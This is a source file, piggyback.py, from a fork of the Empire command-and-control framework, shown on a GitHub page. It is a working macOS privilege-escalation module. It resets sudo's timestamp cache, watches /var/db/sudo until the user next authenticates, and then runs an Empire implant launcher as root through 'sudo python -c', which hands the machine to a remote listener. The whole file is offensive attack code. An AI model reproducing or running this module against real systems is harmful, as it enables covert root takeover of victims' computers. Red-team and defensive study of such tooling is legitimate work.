forked from EmpireProject/Empire
-
-
Notifications
You must be signed in to change notification settings - Fork 578
/
piggyback.py
55 lines (50 loc) · 1.58 KB
/
piggyback.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from empire.server.common.empire import MainMenu
from empire.server.core.module_models import EmpireModule
from empire.server.utils.module_util import handle_error_message
class Module:
@staticmethod
def generate(
main_menu: MainMenu,
module: EmpireModule,
params: dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# extract all of our options
listener_name = params["Listener"]
user_agent = params["UserAgent"]
safe_checks = params["SafeChecks"]
# generate the launcher code
launcher = main_menu.stagers.generate_launcher(
listener_name,
language="python",
userAgent=user_agent,
safeChecks=safe_checks,
)
if launcher == "":
return handle_error_message("[!] Error in launcher command generation.")
else:
launcher = launcher.replace("'", "\\'")
launcher = launcher.replace("echo", "")
parts = launcher.split("|")
launcher = "sudo python -c %s" % (parts[0])
script = """
import os
import time
import subprocess
sudoDir = "/var/db/sudo"
subprocess.call(['sudo -K'], shell=True)
oldTime = time.ctime(os.path.getmtime(sudoDir))
exitLoop=False
while exitLoop is False:
newTime = time.ctime(os.path.getmtime(sudoDir))
if oldTime != newTime:
try:
subprocess.call(['%s'], shell=True)
exitLoop = True
except:
pass
""" % (
launcher
)
return script